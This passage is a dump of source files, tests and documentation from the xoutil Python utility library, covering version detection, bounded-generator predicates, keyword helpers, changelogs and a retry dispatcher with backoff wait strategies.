The attribute 'pypy' could be used\n to determine if this is a PyPy instance or not.\n\n \"\"\"\n\n def __new__(cls):\n import sys\n\n self = super().__new__(cls, sys.version_info)\n self.pypy = sys.version.find(\"PyPy\") >= 0\n return self\n\n @property\n def releaselevel(self):\n return self[3]\n\n @property\n def serial(self):\n return self[4]\n\n\ndef _get_mod_version(mod):\n \"\"\"Get a valid version from a module.\n\n Used internally by `PackageVersion`:class:.\n\n \"\"\"\n valid_names = (\n \"VERSION_INFO\",\n \"VERSION\",\n \"version_info\",\n \"version\",\n \"__VERSION__\",\n \"__version__\",\n )\n i = 0\n res = None\n while res is None and i < len(valid_names):\n name = valid_names[i]\n version = getattr(mod, name, None)\n if version is not None:\n try:\n res = _check(version)\n except (TypeError, ValueError):\n pass\n i += 1\n if not res:\n import os\n\n path = os.path.dirname(os.__file__)\n if mod.__file__.startswith(path):\n res = python_version\n return res\n\n\nclass PackageVersion(ThreeNumbersVersion):\n \"\"\"Current Package version.\n\n Extra components (besides 'major', 'minor', and 'micro') are:\n 'releaselevel' (a string that could be 'alpha', 'beta', 'candidate', or\n 'final'), and 'serial' (an integer). 
The attribute 'pypy' could be used\n to determine if this is a PyPy instance or not.\n\n \"\"\"\n\n def __new__(cls, package_name):\n info = cls._find_version(package_name)\n if info:\n return super().__new__(cls, info)\n else:\n msg = \"{}() could not determine a valid version\"\n raise ValueError(msg.format(cls.__name__))\n\n @staticmethod\n def _find_version(package_name):\n from pkg_resources import get_distribution, ResolutionError\n\n if package_name in (\"__builtin__\", \"builtins\"):\n return python_version\n else:\n res = None\n while not res and package_name:\n try:\n dist = get_distribution(package_name)\n try:\n res = dist.parsed_version.base_version\n except AttributeError:\n res = dist.version\n except ResolutionError:\n from importlib import import_module\n\n try:\n mod = import_module(\".\".join((package_name, \"release\")))\n res = _get_mod_version(mod)\n except ImportError:\n try:\n mod = import_module(package_name)\n res = _get_mod_version(mod)\n except ImportError:\n mod = __import__(package_name)\n res = _get_mod_version(mod)\n if not res:\n aux = package_name.rsplit(\".\", 1)\n package_name = aux[0] if len(aux) > 1 else \"\"\n return res\n" }, { "alpha_fraction": 0.48906639218330383, "alphanum_fraction": 0.5193210244178772, "avg_line_length": 26.363388061523438, "blob_id": "d3b5817b4e451067e3d3e852129b93d2b0316819", "content_id": "a4148e6d7027942ec2ba1fff277e19b84c3ee7e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10016, "license_type": "no_license", "max_line_length": 77, "num_lines": 366, "path": "/tests/test_bound.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you 
to.\n#\n\nimport unittest\nfrom xoutil.bound import boundary, whenall, whenany\n\n\ndef fibonacci(wait=None):\n import time\n\n a, b = 1, 1\n while True:\n if wait:\n time.sleep(wait)\n yield a\n a, b = b, a + b\n\n\nclass TestBoundedWithStandardPredicates(unittest.TestCase):\n def test_times(self):\n from xoutil.bound import times, until\n\n fib8 = times(8)(fibonacci)\n # Fibonacci numbers are yielded:\n # 1 1 2 3 5 8 13 21\n self.assertEqual(fib8(), 21)\n\n fib8 = until(times=8)(fibonacci)\n # Fibonacci numbers are yielded:\n # 1 1 2 3 5 8 13 21\n self.assertEqual(fib8(), 21)\n\n fib8 = times(8)(fibonacci)\n\n fib8gen = fib8.generate() # exposed bounded generator\n self.assertEqual(tuple(fib8gen), (1, 1, 2, 3, 5, 8, 13, 21))\n\n def test_until_error(self):\n from xoutil.bound import until\n\n d = dict(a=1, b=2, c=3, d=4)\n\n @until(errors=(KeyError,))\n def getall(d, *keys):\n for k in keys:\n yield d[k]\n\n assert d[\"d\"] == getall(d, \"a\", \"b\", \"d\")\n assert d[\"a\"] == getall(d, \"a\", \"kkk\")\n\n @until(errors=(ValueError,))\n def getall(d, *keys):\n for k in keys:\n yield d[k]\n\n with self.assertRaises(KeyError):\n getall(d, \"kkk\")\n\n @until(errors=(RuntimeError,))\n def failing():\n raise RuntimeError\n yield 1\n\n assert failing() is None\n assert list(failing.generate()) == []\n\n def test_timed(self):\n from xoutil.bound import timed, until\n\n fib10ms = timed(1 / 100)(fibonacci)\n # Since the wait time below will be larger than the allowed execution\n # (10 ms) fib1ms will only be able to yield a single value (notice\n # that `timed` always allow a cycle.)\n res = fib10ms(wait=1 / 10)\n self.assertEqual(res, 1)\n\n fib10ms = until(maxtime=1 / 100)(fibonacci)\n # Since the wait time below will be larger than the allowed execution\n # (10 ms) fib1ms will only be able to yield a single value (notice\n # that `timed` always allow a cycle.)\n res = fib10ms(wait=1 / 10)\n self.assertEqual(res, 1)\n\n # If the time boundary is too low timed will 
allow not allow a cycle.\n fib0ms = timed(0)(fibonacci)\n res = fib0ms()\n self.assertEqual(res, None)\n\n def test_accumulated(self):\n from xoutil.bound import until\n from xoutil.bound import accumulated, timed, times\n\n # 1 + 1 + 2 + 3 + 5 + 8 + 13 + 21 + 34 + 55 + 89 + 144 = 376\n # ^ ^ ... ^\n # | | ... |\n # 1 2 3 4 5 6 7 8 9 10 11 12 13\n # | | ... | |\n # V V ... V V\n # 1 + 1 + 2 + 3 + 5 + 8 + 13 + 21 + 34 + 55 + 89 + 144 + 233 = 609\n fib500 = accumulated(500)(fibonacci)\n self.assertEqual(fib500(), 233)\n fib500 = until(accumulate=500)(fibonacci)\n self.assertEqual(fib500(), 233)\n\n fib500timed = whenall(accumulated(500), timed(0))(fibonacci)\n self.assertEqual(fib500timed(), 233)\n\n self.assertEqual(\n tuple(fib500.generate()),\n (1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233),\n )\n\n # With .generate() you may count\n self.assertEqual(len(tuple(fib500.generate())), 13) # the 13th\n\n # Since 500 is reached at the 13th fib number, looping up to the 20th\n # number must be bigger.\n fib500at20 = whenall(accumulated(500), times(20))(fibonacci)\n self.assertGreater(fib500at20(), 233)\n\n\nclass TestBoundaryDefinitions(unittest.TestCase):\n def test_argless_boundary(self):\n @boundary\n def argless():\n yield False # receive args\n yield False # allow first yield\n yield True\n\n # the following simulates:\n # @argless\n # def fibonacci():\n # ....\n fib2 = argless(fibonacci)\n self.assertEqual(fib2(), 1)\n\n\nclass TestHigherLevelPreds(unittest.TestCase):\n def test_close_is_always_called(self):\n @boundary\n def bailout():\n yield\n try:\n yield False\n yield True\n except GeneratorExit:\n pass\n else:\n raise AssertionError(\"close() must have been called\")\n\n fibnone = whenall(whenany(bailout))(fibonacci)\n self.assertEqual(fibnone(), 1)\n\n def test_whenall_with_invalid(self):\n from xoutil.bound import times\n\n @boundary\n def invalid():\n yield\n\n fibinv = whenall(invalid, times(10))(fibonacci)\n with self.assertRaises(RuntimeError):\n 
fibinv()\n\n def test_whenall_with_invalid_befored_terminated(self):\n from xoutil.bound import times\n\n @boundary\n def invalid():\n yield\n yield False\n\n fibinv = whenall(invalid, times(10))(fibonacci)\n with self.assertRaises(RuntimeError):\n fibinv()\n\n\nclass TestBoundedUnnamedPredicates(unittest.TestCase):\n def test_atmost_unnamed(self):\n from xoutil.bound import times\n\n fib8 = times(8)(fibonacci)\n # Fibonacci numbers are yielded:\n # 1 1 2 3 5 8 13 21\n self.assertEqual(fib8(), 21)\n\n def test_invalid_unnamed(self):\n @boundary\n def invalid():\n return 1\n\n @invalid\n def foobar():\n while True:\n yield\n\n with self.assertRaises(TypeError):\n foobar()\n\n @boundary\n def invalid_init():\n yield\n\n @invalid_init\n def foobar2():\n while True:\n yield\n\n with self.assertRaises(RuntimeError):\n foobar2()\n\n\nclass TestBoundedPredicates(unittest.TestCase):\n def test_invalid_predicate_early_at_init(self):\n @boundary\n def invalid():\n yield\n\n @invalid\n def foobar():\n pass\n\n with self.assertRaises(RuntimeError):\n foobar()\n\n def test_invalid_predicate_early_at_cycle(self):\n @boundary\n def invalid():\n yield\n yield False # i.e never signal True\n\n @invalid\n def foobar():\n passes, atmost = 0, 10\n while passes < atmost:\n yield passes\n passes += 1\n raise AssertionError(\n \"Invalid reach point a GeneratorExit was \" \"expected.\"\n )\n\n with self.assertRaises(RuntimeError):\n foobar()\n\n\nclass TestMisc(unittest.TestCase):\n def test_args_are_passed(self):\n @boundary\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {})\n yield True\n\n @pred\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2)\n\n def test_whens_receives_args(self):\n from xoutil.bound import whenall, whenany\n\n self.assertTrue(whenall.receive_args)\n self.assertTrue(whenany.receive_args)\n\n def test_args_are_passed_to_all(self):\n from xoutil.bound import whenall, whenany\n\n @boundary\n def 
pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {\"egg\": \"ham\"})\n yield True\n\n @whenall(pred, pred())\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n @whenany(pred(), pred)\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n def test_needs_args(self):\n from xoutil.bound import times\n\n @whenall(times)\n def foobar():\n yield\n\n with self.assertRaises(TypeError):\n foobar() # times is not initialized\n\n def test_plain_function(self):\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {\"egg\": \"ham\"})\n yield True\n\n @whenall(pred)\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n def test_generators(self):\n def pred():\n args, kwargs = yield\n self.assertEqual(args, (1, 2))\n self.assertEqual(kwargs, {\"egg\": \"ham\"})\n yield True\n\n @whenall(pred()) # a generator!!\n def foobar(*args, **kwargs):\n while True:\n yield 1\n\n foobar(1, 2, egg=\"ham\")\n\n def test_plain_generator(self):\n from xoutil.bound import times\n\n fibseq = fibonacci()\n limited = times(5)(fibseq)\n self.assertEqual(limited(), 5)\n\n\nclass TestTerminationCases(unittest.TestCase):\n def test_termination_when_exception(self):\n def magic_number(a):\n if a < 1:\n yield 0\n else:\n prev = next(magic_number(a - 1))\n yield a + prev\n\n @boundary\n def forever():\n try:\n while True:\n yield False\n except GeneratorExit:\n pass # ok\n else:\n raise AssertionError(\"close() not called to boundary\")\n\n bounded = forever()(magic_number)\n bounded(0) # No exception\n with self.assertRaises(TypeError):\n bounded(\"invalid\")\n" }, { "alpha_fraction": 0.5364705920219421, "alphanum_fraction": 0.5458823442459106, "avg_line_length": 27.33333396911621, "blob_id": "2461bd24dd382314ed3b187edd5e7e526dd680d6", "content_id": "9ddd512f08cbe69d1237da46f46276b49de8ee7f", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 72, "num_lines": 15, "path": "/tests/test_pprint.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\ndef test_ppformat_rtype():\n from xoutil.future.pprint import ppformat\n\n o = [list(range(i + 1)) for i in range(10)]\n assert type(ppformat(o)) is str\n" }, { "alpha_fraction": 0.6471264362335205, "alphanum_fraction": 0.6482758522033691, "avg_line_length": 23.85714340209961, "blob_id": "2a9345f59cbe2e2a150036b5d49e2543543c169f", "content_id": "15ecc68e3e3109b4704fbf53e48d7adff2fa5e51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1741, "license_type": "no_license", "max_line_length": 76, "num_lines": 70, "path": "/xotl/tools/keywords.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Tools for manage Python keywords as names.\n\nReserved Python keywords can't be used as attribute names, so this module\nfunctions use the convention of rename the name using an underscore as\nsuffix when a reserved keyword is used as name.\n\n\"\"\"\n\n\ndef suffix_kwd(name):\n \"\"\"Add an underscore suffix if name if a Python keyword.\"\"\"\n from keyword import iskeyword\n\n return \"{}_\".format(name) if iskeyword(name) else name\n\n\ndef org_kwd(name):\n 
\"\"\"Remove the underscore suffix if name starts with a Python keyword.\"\"\"\n from keyword import iskeyword\n\n if name.endswith(\"_\"):\n res = name[:-1]\n return res if iskeyword(res) else name\n else:\n return name\n\n\ndef getkwd(obj, name, default=None):\n \"\"\"Like `getattr` but taking into account Python keywords.\"\"\"\n return getattr(obj, suffix_kwd(name), default)\n\n\ndef setkwd(obj, name, value):\n \"\"\"Like `setattr` but taking into account Python keywords.\"\"\"\n setattr(obj, suffix_kwd(name), value)\n\n\ndef delkwd(obj, name):\n \"\"\"Like `delattr` but taking into account Python keywords.\"\"\"\n delattr(obj, suffix_kwd(name))\n\n\ndef kwd_getter(obj):\n \"\"\"partial(getkwd, obj)\"\"\"\n from functools import partial\n\n return partial(getkwd, obj)\n\n\ndef kwd_setter(obj):\n \"\"\"partial(setkwd, obj)\"\"\"\n from functools import partial\n\n return partial(setkwd, obj)\n\n\ndef kwd_deleter(obj):\n \"\"\"partial(delkwd, obj)\"\"\"\n from functools import partial\n\n return partial(delkwd, obj)\n" }, { "alpha_fraction": 0.5486425161361694, "alphanum_fraction": 0.5531674027442932, "avg_line_length": 22.891891479492188, "blob_id": "36891d013a1023c0c7a45ebd3a3943b7cf04b1ac", "content_id": "a4ed380300c2d1cb67667b319436406373ad3f70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 72, "num_lines": 37, "path": "/tests/test_tools.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\ndef test_nameof():\n from xoutil.tools import nameof\n\n class foobar:\n pass\n\n singletons = (None, True, False, Ellipsis, NotImplemented)\n\n 
assert nameof(foobar) == nameof(foobar()) == \"foobar\"\n assert nameof(object) == \"object\"\n assert nameof(test_nameof) == \"test_nameof\"\n\n assert nameof(lambda x: x) == \"<lambda>\"\n\n assert [nameof(s) for s in singletons] == [\n \"None\",\n \"True\",\n \"False\",\n \"Ellipsis\",\n \"NotImplemented\",\n ]\n\n assert nameof(1) == \"int\"\n assert nameof(1.0) == \"float\"\n\n\n# TODO: Add tests for remainder functions in this module.\n" }, { "alpha_fraction": 0.46315789222717285, "alphanum_fraction": 0.46315789222717285, "avg_line_length": 37, "blob_id": "7bb8d9f3e0cbb5de8b78f1f943e3796e42570954", "content_id": "91b32d67ac330037cf78fc922006931fadc2a9c6", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 190, "license_type": "permissive", "max_line_length": 69, "num_lines": 5, "path": "/docs/source/xotl.tools/cpystack.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.cpystack`:mod: - Utilities to inspect the CPython's stack\n=====================================================================\n\n.. 
automodule:: xotl.tools.cpystack\n :members:\n" }, { "alpha_fraction": 0.5278350710868835, "alphanum_fraction": 0.5340206027030945, "avg_line_length": 21.045454025268555, "blob_id": "08338d53c4990804c91fc0796ae3811de2a3e07d", "content_id": "cea840c8276de946c9e72758f4f7fc12bdeb1971", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 485, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/docs/source/xotl.tools/testing.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "================================================\n `xotl.tools.testing`:mod: -- Utilities testing\n================================================\n\n.. module:: xotl.tools.testing\n\nProvides `sample data generators`__ for xotl.tools's data structures.\n\n.. warning:: You must install ``xotl.tools[testing]`` in order to get extra\n dependencies.\n\n.. versionadded:: 1.8.2\n\n\n__ hypothesis_\n.. _hypothesis: https://hypothesis.readthedocs.io/\n\n\n.. toctree::\n :glob:\n\n testing/*\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7637614607810974, "avg_line_length": 38.6363639831543, "blob_id": "16d6404a68823cfb8991708becb2bcf0306cb4c0", "content_id": "00a3ec73f54ec8910c073af81bc7cf8e73860e73", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1308, "license_type": "permissive", "max_line_length": 78, "num_lines": 33, "path": "/docs/source/history/_changes-1.5.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- UserList are now collections in the sense of\n `xoutil.types.is_collection`:func:.\n\n- Python 3.4 added to the list of tested Python environments. 
Notice this\n does not makes any warrants about identical behavior of things that were\n previously backported from Python 3.3.\n\n For instance, the `xoutil.collections.ChainMap`:class: has been already\n backported from Python 3.4, so it will have the same signature and behavior\n across all supported Python versions.\n\n But other new things in Python 3.4 are not yet backported to xoutil.\n\n- Now `xoutil.objects.metaclass`:func: supports the ``__prepare__``\n classmethod of metaclasses. This is fully supported in Python 3.0+ and\n partially mocked in Python 2.7.\n\n- Backported `xoutil.types.MappingProxyType`:class: from Python 3.3.\n\n- Backported `xoutil.types.SimpleNamespace`:class: from Python 3.4.\n\n- Backported `xoutil.types.DynamicClassAttribute`:class: from Python 3.4\n\n- Added function `xoutil.iterators.delete_duplicates`:func:.\n\n- Added parameter `ignore_underscore` to `xoutil.string.normalize_slug`:func:.\n\n- Added module `xoutil.crypto`:mod: with a function for generating passwords.\n\n- Fixed several bug in `xoutil.functools.compose`:func:.\n\n- Makes `xoutil.fs.path.rtrim`:func: have a default value for the amount of\n step to traverse.\n" }, { "alpha_fraction": 0.7509340047836304, "alphanum_fraction": 0.7509340047836304, "avg_line_length": 39.150001525878906, "blob_id": "632801d69781fac03960f460697dc210a99318f9", "content_id": "03e5d50c3312cf9056e5a21f46646f3311332633", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 803, "license_type": "permissive", "max_line_length": 78, "num_lines": 20, "path": "/docs/source/history/changes-1.4.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Adds `xoutil.datetime.daterange`:func:.\n\n- Adds `xoutil.objects.traverse`:func:.\n\n- Adds `xoutil.fs.makedirs`:func: and `xoutil.fs.ensure_filename`:func:.\n\n- The `fill` argument in function 
`xoutil.iterators.slides`:func: now defaults\n to None. This is consistent with the intended usage of\n `~xoutil.Unset`:class: and with the semantics of both\n `xoutil.iterators.continuously_slides`:func: and\n `xoutil.iterators.first_n`:func:.\n\n Unset, as a default value for parameters, is meant to signify the absence\n of an argument and thus only would be valid if an absent argument had some\n kind of effect *different* from passing the argument.\n\n- Changes `xoutil.modules.customize`:func: API to separate options from\n custom attributes.\n\n- Includes a `random` parameter to `xoutil.uuid.uuid`:func:.\n" }, { "alpha_fraction": 0.7035040259361267, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 29.91666603088379, "blob_id": "938982d7570c1fb5ff78825bb7871be50bbc8b97", "content_id": "0d61e2350683e387ee727d2435f0d491e57e71b0", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 371, "license_type": "permissive", "max_line_length": 75, "num_lines": 12, "path": "/docs/source/history/_changes-1.9.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add support for Python 3.7.\n\n- ``xoutil.eight.abc.ABC`` is an alias to the stdlib's `ABC` class if using\n Python 3.4+.\n\n- Rename ``xoutil.fp.iterators.iter_compose`` to\n `xoutil.fp.iterators.kleisli_compose`:func:. 
Leave ``iter_compose`` as\n deprecated alias.\n\n- Add `xoutil.future.datetime.TimeSpan.diff`:meth:\n\n- Add `xoutil.future.datetime.DateTimeSpan`:class:.\n" }, { "alpha_fraction": 0.7052313685417175, "alphanum_fraction": 0.7082495093345642, "avg_line_length": 38.7599983215332, "blob_id": "ae3dbe6185d2199b35145bfe311fea3b05b404e0", "content_id": "3ca3c16dcb4ed47aa6d2723631647df458dfd9ee", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 994, "license_type": "permissive", "max_line_length": 79, "num_lines": 25, "path": "/docs/source/history/_changes-1.5.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Lots of removals. Practically all deprecated since 1.4.0 (or before). Let's\n list a few but not all:\n\n - Both `xoutil.Unset`:obj: and `xoutil.Ignored`:obj: are no longer\n re-exported in `xoutil.types`:mod:.\n\n - Removes module `!xoutil.decorator.compat`:mod:, since it only contained the\n deprecated decorator `!xoutil.decorator.compat.metaclass`:func: in favor of\n `xoutil.objects.metaclass`:func:.\n\n - Removes ``nameof`` and ``full_nameof`` from `xoutil.objects`:mod: in favor\n of `xoutil.names.nameof`:func:.\n\n - Removes ``pow_`` alias of `xoutil.functools.power`:func:.\n\n - Removes the deprecated ``xoutil.decorator.decorator`` function. 
Use\n `xoutil.decorator.meta.decorator`:func: instead.\n\n - Now `~xoutil.modules.get_module_path`:func: is documented and in module\n `xoutil.modules`:mod:.\n\n- Also we have documented a few more functions, including\n `xoutil.fs.path.rtrim`:func:.\n\n- All modules below `!xoutil.aop`:mod: are in risk and are being deprecated.\n" }, { "alpha_fraction": 0.5883951783180237, "alphanum_fraction": 0.5968202352523804, "avg_line_length": 26.769811630249023, "blob_id": "ac0805ecfee5b93c08934be5192644e546c47e8e", "content_id": "8a182bba7653e94e2266eb101cf560a9d12395b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7360, "license_type": "no_license", "max_line_length": 88, "num_lines": 265, "path": "/xotl/tools/tasking/__init__.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Task, multitasking, and concurrent programming tools.\n\n.. warning:: Experimental. API is not settled.\n\n.. 
versionadded:: 1.8.0\n\n\"\"\"\n\nimport sys\nfrom xotl.tools.deprecation import deprecated_alias\n\n\n# TODO: Must be implemented using `xotl.tools.api` mechanisms for correct\n# driver determination, in this case \"thread-local data\".\nif \"greenlet\" in sys.modules:\n from ._greenlet_local import local # noqa\nelse:\n try:\n from threading import local # noqa\n except ImportError:\n from dummy_threading import local # noqa\n\ndel sys\n\n\nclass AutoLocal(local):\n \"\"\"Initialize thread-safe local data in one shoot.\n\n Typical use is::\n\n >>> from xotl.tools.tasking import AutoLocal\n >>> context = AutoLocal(cause=None, traceback=None)\n\n When at least one attribute is given, ``del AutoLocal`` it's executed\n automatically avoiding this common statement at the end of your module.\n\n \"\"\"\n\n def __init__(self, **attrs):\n import sys\n\n super().__init__()\n for attr in attrs:\n setattr(self, attr, attrs[attr])\n if attrs:\n g = sys._getframe(1).f_globals\n tname = type(self).__name__\n if tname in g:\n del g[tname]\n\n\n#: The minimal time (in seconds) to wait between retries.\n#:\n#: .. versionadded:: 1.8.2\nMIN_WAIT_INTERVAL = 20 / 1000 # 20 ms\n\n#: The default time (in seconds) to wait between retries.\n#:\n#: .. versionadded:: 1.8.2\nDEFAULT_WAIT_INTERVAL = 50 / 1000 # 50 ms\n\n\nclass ConstantWait:\n \"\"\"A constant wait algorithm.\n\n Instances are callables that comply with the need of the `wait` argument\n for `retrier`:class:. This callable always return the same `wait` value.\n\n We never wait less than `MIN_WAIT_INTERVAL`:data:.\n\n .. versionadded:: 1.8.2\n\n .. versionchanged:: 1.9.1 Renamed; it was ``StandardWait``. The old name\n is kept as a deprecated alias.\n\n .. versionchanged:: 2.0.1 Renamed; it was ``StandardWait``. 
The old name\n is kept as a deprecated alias.\n\n \"\"\"\n\n def __init__(self, wait=DEFAULT_WAIT_INTERVAL):\n import numbers\n\n if not isinstance(wait, numbers.Real):\n raise TypeError(\"'wait' must a number.\")\n self.wait = max(MIN_WAIT_INTERVAL, wait)\n\n def __call__(self, prev=None):\n return self.wait\n\n\nStandardWait = deprecated_alias(\n ConstantWait, msg=\"StandardWait is deprecated. Use ConstantWait instead\"\n)\n\n\nclass BackoffWait:\n \"\"\"A wait algorithm with an exponential backoff.\n\n Instances are callables that comply with the need of the `wait` argument\n for `retrier`:class:.\n\n At each call the wait is increased by doubling `backoff` (given in\n milliseconds).\n\n We never wait less than `MIN_WAIT_INTERVAL`:data:.\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n\n def __init__(self, wait=DEFAULT_WAIT_INTERVAL, backoff=1):\n self.wait = max(MIN_WAIT_INTERVAL, wait)\n self.backoff = min(max(0.1, backoff), 1)\n\n def __call__(self, prev=None):\n res = self.wait + (self.backoff / 1000)\n self.backoff = self.backoff * 2\n return res\n\n\ndef get_backoff_wait(n, *, wait=DEFAULT_WAIT_INTERVAL, backoff=1):\n \"\"\"Compute the total backoff wait time after `n` tries.\n\n .. seealso:: `BackoffWait`:class:.\n\n .. versionadded:: 2.1.0\n\n \"\"\"\n res = 0\n fn = BackoffWait(wait=wait, backoff=backoff)\n for _ in range(n):\n res = fn(prev=res)\n return res\n\n\ndef retry(\n fn,\n args=None,\n kwargs=None,\n *,\n max_tries=None,\n max_time=None,\n wait=DEFAULT_WAIT_INTERVAL,\n retry_only=None\n):\n \"\"\"Run `fn` with args and kwargs in an auto-retrying loop.\n\n See `retrier`:class:. This is just::\n\n >>> retrier(max_tries=max_tries, max_time=max_time, wait=wait,\n ... retry_only=retry_only)(fn, *args, **kwargs)\n\n .. 
versionadded:: 1.8.2\n\n \"\"\"\n if args is None:\n args = ()\n if kwargs is None:\n kwargs = {}\n return retrier(\n max_tries=max_tries, max_time=max_time, wait=wait, retry_only=retry_only\n )(fn, *args, **kwargs)\n\n\nclass retrier:\n \"\"\"An auto-retrying dispatcher.\n\n A retrier it's a callable that takes another callable (`func`) and its\n arguments and runs it in an auto-retrying loop.\n\n If `func` raises any exception that is in `retry_only`, and it has being\n tried less than `max_tries` and the time spent executing the function\n (waiting included) has not reached `max_time`, the function will be\n retried.\n\n `wait` can be a callable or a number. If `wait` is callable, it must take\n a single argument with the previous waiting we did (`None`:data: for the\n first retry) and return the number of seconds to wait before retrying.\n\n If `wait` is a number, we convert it to a callable with\n `ConstantWait(wait) <ConstantWait>`:class:.\n\n .. seealso:: `BackoffWait`:class:\n\n If `retry_only` is None, all exceptions (that inherits from Exception)\n will be retried. Otherwise, only the exceptions in `retry_only` will be\n retried.\n\n Waiting is done with `time.sleep`:func:. Time tracking is done with\n `time.monotonic`:func:.\n\n .. 
versionadded:: 1.8.2\n\n \"\"\"\n\n def __init__(\n self, max_tries=None, max_time=None, wait=DEFAULT_WAIT_INTERVAL, retry_only=None\n ):\n if not max_tries and not max_time:\n raise TypeError(\"One of tries or times must be set\")\n self.max_tries = max_tries\n self.max_time = max_time\n if not callable(wait):\n self.wait = ConstantWait(wait)\n else:\n self.wait = wait\n if not retry_only:\n self.retry_only = (Exception,)\n else:\n self.retry_only = retry_only\n\n def __call__(self, fn, *args, **kwargs):\n return self.decorate(fn)(*args, **kwargs)\n\n def decorate(self, fn):\n \"\"\"Return `fn` decorated to run in an auto-retry loop.\n\n You can use this to decorate a function you'll always run inside a\n retrying loop:\n\n >>> @retrier(max_tries=5, retry_only=TransientError).decorate\n ... def read_from_url(url):\n ... pass\n\n \"\"\"\n from time import monotonic as clock, sleep\n from xotl.tools.future.functools import wraps\n\n max_time = self.max_time\n max_tries = self.max_tries\n\n @wraps(fn)\n def inner(*args, **kwargs):\n t = 0\n done = False\n start = clock()\n waited = None\n while not done:\n try:\n return fn(*args, **kwargs)\n except self.retry_only:\n t += 1\n reached_max_tries = max_tries and t >= max_tries\n max_time_elapsed = max_time and clock() - start >= max_time\n retry = not reached_max_tries and not max_time_elapsed\n if retry:\n waited = self.wait(waited)\n sleep(waited)\n else:\n raise\n\n return inner\n\n\ndel deprecated_alias\n" }, { "alpha_fraction": 0.5715555548667908, "alphanum_fraction": 0.5759999752044678, "avg_line_length": 24.56818199157715, "blob_id": "a8b978c616453fed89f23ba673f9a47d63fb8a66", "content_id": "6f6cec96455616d446439592200a532c11dc38b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1126, "license_type": "no_license", "max_line_length": 87, "num_lines": 44, "path": "/xotl/tools/cli/app.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", 
